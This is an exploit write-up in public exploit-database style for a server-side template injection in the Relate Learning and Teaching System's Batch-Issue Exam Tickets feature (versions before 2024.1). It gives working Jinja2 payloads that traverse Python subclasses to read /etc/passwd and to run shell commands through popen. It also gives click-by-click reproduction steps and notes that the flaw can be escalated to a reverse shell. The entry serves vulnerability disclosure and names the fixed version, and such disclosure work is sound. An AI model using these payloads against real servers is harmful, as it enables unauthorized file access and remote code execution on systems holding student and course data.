Relate Learning and Teaching System versions prior to 2024.1 suffers from a server-side template injection vulnerability that leads to remote code execution. This particular finding targets the Batch-Issue Exam Tickets function.
# Exploit Title: Relate Learning And Teaching system Version before 2024.1 SSTI(Batch-Issue Exam Tickets function) lead to RCE
# Date: 24/04/2024
# Exploit Author: kai6u
# Vendor Homepage: https://github.com/inducer/
# Software Link: https://github.com/inducer/relate
# Affected Version:before 2024.1 (https://github.com/inducer/relate/commit/2fdbd4480a2d0a45c746639be244a61a0d4112b6)
# Fixed Version:2024.1 (https://github.com/inducer/relate/commit/d9fa7dcb84b8e5a64ce78ced4f56cdd61c0d59aa)
# Tested on: Ubuntu 22.04
# Summary:
SSTI in Batch-Issue Exam Tickets function of Relate Learning And Teaching system
# Description:
* 【Prerequisite】
* The attacker has stolen the privilege to issue exam tickets. For example, attacker is logged in as an course administrator.
* SSTI is in the `Batch-Issue Exam Tickets` feature, which allows user to specify the format in which tickets are distributed and uses a Django (Jinja2) template internally.
1) First, the attacker uses the Ticket Format feature to plant the following payload.
* Payload:
* `{{ 'abc'.__class__.__base__.__subclasses__()[111].__subclasses__()[0].__subclasses__()[0]('/etc/passwd').read() }}`
* Note that the subclasses index number in the payload depends on the python version, so it must be changed depending on the environment.
2) Click an Issue Ticket including the above payload.
* Then you will see that the contents of the `/etc/passwd` file are output at the after Ticket Code block.
3) Next, the attacker modifies the above payload to execute arbitrary commands by changing the subclasses index number to the number of popen.
* Payload:
* `{{ 'abc'.__class__.__base__.__subclasses__()[210]('whoami',shell=True,stdout=-1).communicate()[0].strip() }}`
4) Click an Issue Ticket including the above payload.
* If you check the results, you will see that `ubuntu` is displayed, which is the result of executing the whoami command.
* An attacker can use this feature to execute reverse shell.
# References
https://book.hacktricks.xyz/v/jp/pentesting-web/ssti-server-side-template-injection
